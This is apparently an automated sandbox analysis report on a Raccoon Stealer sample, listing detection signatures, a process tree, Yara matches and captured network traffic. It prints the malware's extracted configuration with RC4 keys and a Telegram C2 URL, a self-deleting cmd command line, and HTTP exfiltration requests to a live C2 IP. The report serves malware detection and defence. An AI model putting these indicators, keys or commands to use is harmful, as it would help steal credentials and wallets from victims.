Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 31cGYywxgy

Overview

General Information

Sample Name:31cGYywxgy (renamed file extension from none to exe)
Analysis ID:491712
MD5:7739202a73e3f1c15f5f5e6f82434955
SHA1:cb0d64026ee41d99bf74a1b4939442eb53e4bd84
SHA256:626999cdbd44d491c59a9fd35b302f3c18d4c0599c08b53b80716661b0e803ff
Tags:32exetrojan
Infos:

Most interesting Screenshot:

Detection

Raccoon
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Detected unpacking (overwrites its own PE header)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Machine Learning detection for sample
Self deletion via cmd delete
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to steal Mail credentials (via file access)
Uses 32bit PE files
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality to record screenshots
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Is looking for software installed on the system
PE file does not import any functions
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Binary contains a suspicious time stamp
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • 31cGYywxgy.exe (PID: 3104 cmdline: 'C:\Users\user\Desktop\31cGYywxgy.exe' MD5: 7739202A73E3F1C15F5F5E6F82434955)
    • cmd.exe (PID: 6524 cmdline: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\31cGYywxgy.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 6608 cmdline: timeout /T 10 /NOBREAK MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • cleanup

Malware Configuration

Threatname: Raccoon Stealer

{"RC4_key2": "25ef3d2ceb7c85368a843a6d0ff8291d", "C2 url": "https://t.me/agrybirdsgamerept", "Bot ID": "5ff0ccb2bc00dc52d1ad09949e9c7663bc9ca4d4", "RC4_key1": "$Z2s`ten\\@bE9vzR"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmpJoeSecurity_RaccoonYara detected Raccoon StealerJoe Security
    00000000.00000003.257211865.0000000002220000.00000004.00000001.sdmpJoeSecurity_RaccoonYara detected Raccoon StealerJoe Security
      00000000.00000002.282454454.0000000002120000.00000040.00000001.sdmpJoeSecurity_RaccoonYara detected Raccoon StealerJoe Security
        Process Memory Space: 31cGYywxgy.exe PID: 3104JoeSecurity_RaccoonYara detected Raccoon StealerJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.31cGYywxgy.exe.400000.0.unpackJoeSecurity_RaccoonYara detected Raccoon StealerJoe Security
            0.3.31cGYywxgy.exe.2220000.0.unpackJoeSecurity_RaccoonYara detected Raccoon StealerJoe Security
              0.2.31cGYywxgy.exe.2120e50.1.unpackJoeSecurity_RaccoonYara detected Raccoon StealerJoe Security
                0.3.31cGYywxgy.exe.2220000.0.raw.unpackJoeSecurity_RaccoonYara detected Raccoon StealerJoe Security
                  0.2.31cGYywxgy.exe.2120e50.1.raw.unpackJoeSecurity_RaccoonYara detected Raccoon StealerJoe Security
                    Click to see the 1 entries

                    Sigma Overview

                    No Sigma rule has matched

                    Jbx Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Found malware configurationShow sources
                    Source: 0.2.31cGYywxgy.exe.400000.0.unpackMalware Configuration Extractor: Raccoon Stealer {"RC4_key2": "25ef3d2ceb7c85368a843a6d0ff8291d", "C2 url": "https://t.me/agrybirdsgamerept", "Bot ID": "5ff0ccb2bc00dc52d1ad09949e9c7663bc9ca4d4", "RC4_key1": "$Z2s`ten\\@bE9vzR"}
                    Multi AV Scanner detection for submitted fileShow sources
                    Source: 31cGYywxgy.exeReversingLabs: Detection: 40%
                    Yara detected Raccoon StealerShow sources
                    Source: Yara matchFile source: 0.2.31cGYywxgy.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.31cGYywxgy.exe.2220000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.31cGYywxgy.exe.2120e50.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.31cGYywxgy.exe.2220000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.31cGYywxgy.exe.2120e50.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.31cGYywxgy.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.257211865.0000000002220000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.282454454.0000000002120000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 31cGYywxgy.exe PID: 3104, type: MEMORYSTR
                    Machine Learning detection for sampleShow sources
                    Source: 31cGYywxgy.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_0042A130 lstrlenW,lstrlenW,lstrlenW,CredEnumerateW,CryptUnprotectData,LocalFree,CredFree,0_2_0042A130
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_00429F5D CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfW,lstrcatW,wsprintfW,lstrcatW,CryptDestroyHash,CryptReleaseContext,lstrlenW,CryptUnprotectData,LocalFree,0_2_00429F5D
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_0040E139 __EH_prolog,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wsprintfA,CryptUnprotectData,LocalFree,CryptUnprotectData,0_2_0040E139
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_00434A5F lstrlenW,lstrlenW,lstrlenW,CryptUnprotectData,LocalFree,lstrlenW,lstrlenW,lstrlenW,wsprintfA,lstrlenA,0_2_00434A5F

                    Compliance:

                    barindex
                    Detected unpacking (overwrites its own PE header)Show sources
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeUnpacked PE file: 0.2.31cGYywxgy.exe.400000.0.unpack
                    Source: 31cGYywxgy.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49742 version: TLS 1.2
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.0.dr
                    Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.0.dr
                    Source: Binary string: C:\xojine\siyi yovig6.pdb source: 31cGYywxgy.exe
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: 31cGYywxgy.exe, 00000000.00000002.283125621.000000006E920000.00000002.00020000.sdmp, nss3.dll.0.dr
                    Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.0.dr
                    Source: Binary string: ucrtbase.pdb source: ucrtbase.dll.0.dr
                    Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: api-ms-win-core-memory-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.0.dr
                    Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.0.dr
                    Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr
                    Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: 31cGYywxgy.exe, 00000000.00000002.282980746.000000006E819000.00000002.00020000.sdmp, mozglue.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.0.dr
                    Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.0.dr
                    Source: Binary string: XC:\xojine\siyi yovig6.pdb source: 31cGYywxgy.exe
                    Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy.dll.0.dr
                    Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.0.dr
                    Source: Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.0.dr
                    Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.0.dr
                    Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.0.dr
                    Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: 31cGYywxgy.exe, 00000000.00000002.282980746.000000006E819000.00000002.00020000.sdmp, mozglue.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.0.dr
                    Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.0.dr
                    Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr
                    Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr
                    Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
                    Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.0.dr
                    Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.0.dr
                    Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.0.dr
                    Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.0.dr
                    Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr
                    Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.0.dr
                    Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.0.dr
                    Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.0.dr
                    Source: C:\Users\user\Desktop\31cGYywxgy.exeCode function: 0_2_0043EFDD FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,0_2_0043EFDD

                    Networking:

                    barindex
                    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                    Source: TrafficSnort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.5:49755 -> 194.180.174.100:80
                    C2 URLs / IPs found in malware configurationShow sources
                    Source: Malware configuration extractorURLs: https://t.me/agrybirdsgamerept
                    Source: Joe Sandbox ViewASN Name: MIVOCLOUDMD MIVOCLOUDMD
                    Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                    Source: global trafficHTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: t.me
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 194.180.174.100
                    Source: global trafficHTTP traffic detected: GET //l/f/G5GYJXwB3dP17Spz8m-L/d9a87544924531ef155dbccfe1a04e27038ca861 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.100
                    Source: global trafficHTTP traffic detected: GET //l/f/G5GYJXwB3dP17Spz8m-L/70e760d32c85dd68bb76b7cf4f9d65a400d87d16 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.100
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cVContent-Length: 1017Host: 194.180.174.100
                    Source: Joe Sandbox ViewIP Address: 194.180.174.100 194.180.174.100
                    Source: Joe Sandbox ViewIP Address: 194.180.174.100 194.180.174.100
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 18:31:43 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.180.174.100
                    Source: 31cGYywxgy.exe, 00000000.00000002.282856715.0000000002D2D000.00000004.00000001.sdmpString found in binary or memory: http://194.180.174.100/
                    Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmpString found in binary or memory: http://194.180.174.100//l/f/G5GYJXwB3dP17Spz8m-L/70e760d32c85dd68bb76b7cf4f9d65a400d87d16
                    Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmpString found in binary or memory: http://194.180.174.100//l/f/G5GYJXwB3dP17Spz8m-L/70e760d32c85dd68bb76b7cf4f9d65a400d87d167
                    Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmpString found in binary or memory: http://194.180.174.100//l/f/G5GYJXwB3dP17Spz8m-L/70e760d32c85dd68bb76b7cf4f9d65a400d87d16T
                    Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmpString found in binary or memory: http://194.180.174.100//l/f/G5GYJXwB3dP17Spz8m-L/d9a87544924531ef155dbccfe1a04e27038ca861
                    Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmpString found in binary or memory: http://194.180.174.100//l/f/G5GYJXwB3dP17Spz8m-L/d9a87544924531ef155dbccfe1a04e27038ca861ata
                    Source: 31cGYywxgy.exe, 00000000.00000003.276042748.0000000002D2A000.00000004.00000001.sdmpString found in binary or memory: http://194.180.174.100/Pv
                    Source: qipcap.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                    Source: qipcap.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                    Source: nssckbi.dll.0.drString found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
                    Source: nssckbi.dll.0.drString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
                    Source: nssckbi.dll.0.drString found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
                    Source: nssckbi.dll.0.drString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
                    Source: nssckbi.dll.0.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                    Source: nssckbi.dll.0.drString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
                    Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmp, nssckbi.dll.0.drString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
